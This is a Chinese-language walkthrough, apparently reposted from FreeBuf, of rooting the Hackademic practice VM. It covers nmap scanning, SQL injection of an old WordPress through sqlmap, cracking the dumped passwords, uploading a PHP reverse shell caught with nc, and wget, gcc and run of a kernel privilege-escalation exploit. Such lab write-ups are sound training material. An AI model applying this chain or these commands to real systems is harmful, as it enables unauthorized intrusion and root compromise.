渗透测试 实战 基本流程

准备阶段:

首先,下载vmware漏洞镜像并且配置好桥接模式,我们把目标准备好了,但并不知道目标的ip地址,可以使用nmap来扫描发现存活的主机,通过nmap命令nmap -sn 192.168.0.*。

17150205_8M2I.jpg

我们可以发现存活的主机192.168.0.102状态是up状态,该主机即为目标,通过执行命令对192.168.0.102进行扫描,nmap -sS -sV 192.168.0.102

17150205_jbHv.jpg

可以发现该主机开放了80端口,22端口是关闭的,通过访问192.168.0.102的80端口,我们发现该端口上运行了个web应用程序Hackademic

17150205_mxe9.jpg

通过点击root this box,我们跳转到了另外一个页面。

17150205_G6Qp.jpg

该页面告诉我们,需要获取到Hackademic的root权限,并且在/root目标下读取key.txt,ok,let's go start game.

通过查看网页源代码,我们发现这个web应用是运行在WordPress version 1.5.1.1上的。

17150205_KSjQ.jpg

该版本是比较老的,由此我们可以得知它一定存在漏洞,通过google搜索WordPress version 1.5.1.1,我们发现该版本存在一处sql注入漏洞。

17150206_N4i9.jpg

从exp提供的get参数上来看,漏洞存在于cat参数,于是我们对该漏洞进行利用,输入’号后,得到了sql语句执行错误,从sql错误上,可以判断出该系统使用的是mysql。

17150206_FCCM.jpg

通过使用sqlmap进行自动化工具注入,很快获取到了mysql的库名。

17150206_RQPJ.jpg

得到库名后,又通过注入得到了表名。

17150206_IKqg.jpg

然后得到了wodpress库的字段名称。

17150207_pbR3.jpg

通过继续注入,获取到了wp的帐号密码。

17150207_QiQK.jpg

通过破解帐号密码,获取到了wp的账户信息。

17150207_fO4q.jpg

经过扫描该存在漏洞的站点,我们获取到了该系统的后台地址;

17150207_sCXY.jpg

通过尝试上述的用户名密码,得知George Miller的账户是管理员账户,ok,成功登录。

17150208_ytD3.jpg

通过在上传处修改可上传的文件扩展名,php

17150208_onAV.jpg

17150208_kjI2.jpg

通过在上传页面上传,上传php反弹脚本,获取到了文件名。

17150208_SOyi.jpg

通过访问我们上传的php页面,并且在本地使用nc监听4444端口,成功获取shell。

17150208_MQKO.jpg

这里,需要访问/root目录,但经过测试,发现访问/root目标是被禁止的,因为没有权限嘛

17150209_CfBy.jpg

通过之前信息收集,得知内核版本为2.6.31.5-127,而系统为fedora,结合这些信息进行google搜索,得到exp下载地址,下载

wget downloads.securityfocus.com/vulnerabilities/exploits/44219.c,下边也就是大家都知道,伪黑客黑linux3部曲,1、

wget;2、gcc 44129 –o exploit;3、./exploit;

成功获取到了目标root权限:

17150209_vMVq.jpg

通过cd /root,然后运行ls得到目录名称为:

17150209_Ep9a.jpg

查看key.txt,我们获取到了目标文件。

17150209_bjXd.jpg

总结

just enjoy,thx...


原文来自 FreebuF.COM

转载于:https://my.oschina.net/swrite/blog/193835

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值